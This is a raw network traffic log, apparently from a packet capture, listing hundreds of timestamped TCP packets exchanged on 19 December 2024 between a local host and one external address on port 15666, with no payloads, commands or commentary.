                                                                                                  Dec 19, 2024 08:53:05.695542097 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.695554972 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.695593119 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.695684910 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.695698977 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.695743084 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.695794106 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.695806980 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.695847988 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.695878983 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.695934057 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.695959091 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696006060 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696039915 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696080923 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696084023 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696130037 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696186066 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696198940 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696242094 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696299076 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696312904 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696358919 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696365118 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696394920 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696427107 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696445942 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696465969 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696465969 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696582079 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696595907 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696619034 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696633101 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696671009 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696707964 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696716070 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696757078 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696834087 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696858883 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696880102 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696903944 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.696918964 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.696963072 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.697614908 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.697662115 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.697681904 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.697717905 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.697772026 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.697793007 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.697907925 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.697921038 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.697940111 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.697985888 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698000908 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698008060 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698040962 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698051929 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698157072 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698169947 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698203087 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698287964 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698302031 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698348999 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698378086 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698442936 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698494911 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698523998 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698558092 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698607922 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698651075 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698663950 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698708057 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698721886 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698790073 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698802948 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698836088 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698846102 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698853016 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698890924 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698896885 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698945045 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.698961973 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.698975086 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.699018955 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.699033022 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.699045897 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.699088097 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.699106932 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.699131966 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.699150085 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.699177027 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.699178934 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.699233055 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.700565100 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.700614929 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.700670958 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.700686932 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.700737000 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.700884104 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.700900078 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.700927019 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.700942039 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701100111 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701116085 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701143980 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701144934 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701162100 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701164961 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701189041 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701229095 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701251030 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701267958 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701303959 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701306105 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701313019 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701347113 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701350927 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701391935 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701517105 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701534033 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701565027 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701586962 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701602936 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701618910 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701667070 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701679945 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701697111 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701742887 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701745033 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701773882 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701821089 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701877117 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701894045 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701915026 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701929092 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701940060 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701944113 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.701947927 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.701987028 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703232050 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703286886 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703291893 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703309059 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703351021 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703358889 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703361988 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703406096 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703464031 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703505039 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703512907 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703547001 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703586102 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703608990 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703654051 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703672886 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703708887 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703741074 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703764915 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703788042 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.703947067 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703963041 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.703983068 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.704005003 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.704036951 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.704052925 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.704096079 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.704112053 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.704149008 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.704190016 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.704222918 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.704240084 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.794409990 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.794500113 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.794533014 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.794614077 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.794636965 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.794694901 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.794773102 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.794841051 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.794883966 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.794908047 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.794933081 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.794960022 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.794981003 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.795056105 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.795166016 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.795336962 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.795387983 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.795489073 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.795535088 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.795701027 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.795737028 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.795753002 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.795783997 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.795824051 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.795835972 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.795882940 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.795943022 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796000004 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796046972 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796089888 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796103001 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796117067 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796129942 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796154976 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796267986 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796313047 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796319962 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796354055 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796432972 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796447039 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796480894 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796494961 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796734095 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796758890 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796782970 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796804905 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796816111 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796830893 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796875000 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796895027 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796932936 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.796940088 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.796993017 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797010899 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797056913 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797070980 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797162056 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797174931 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797211885 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797235966 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797276974 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797290087 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797338963 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797362089 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797408104 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797420025 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797472000 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797472954 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797487974 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797523022 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797542095 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797585964 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797610998 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797632933 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797653913 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797672033 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797709942 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797719002 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797763109 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797802925 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797846079 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797890902 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.797956944 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.797970057 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798019886 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798028946 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798065901 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798069954 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798115015 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798194885 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798208952 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798240900 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798258066 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798264980 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798271894 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798300982 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798320055 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798330069 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798345089 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798376083 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798403978 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798423052 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798465014 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798517942 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798520088 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798547029 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798567057 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798590899 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798625946 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798640013 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798654079 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798683882 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798700094 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798712015 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798763037 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798810005 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798823118 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798850060 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798876047 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798883915 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798908949 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798933983 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798938036 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.798964024 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.798979998 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.799011946 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.799024105 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.799071074 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.799125910 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.799139977 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.799176931 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.799186945 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.799226999 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.799257040 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.799271107 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.799297094 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.799350977 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.799374104 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.799396038 CET4970915666192.168.2.5193.3.19.151
                                                                                                  Dec 19, 2024 08:53:05.799416065 CET1566649709193.3.19.151192.168.2.5
                                                                                                  Dec 19, 2024 08:53:05.799416065 CET4970915666192.168.2.5193.3.19.151
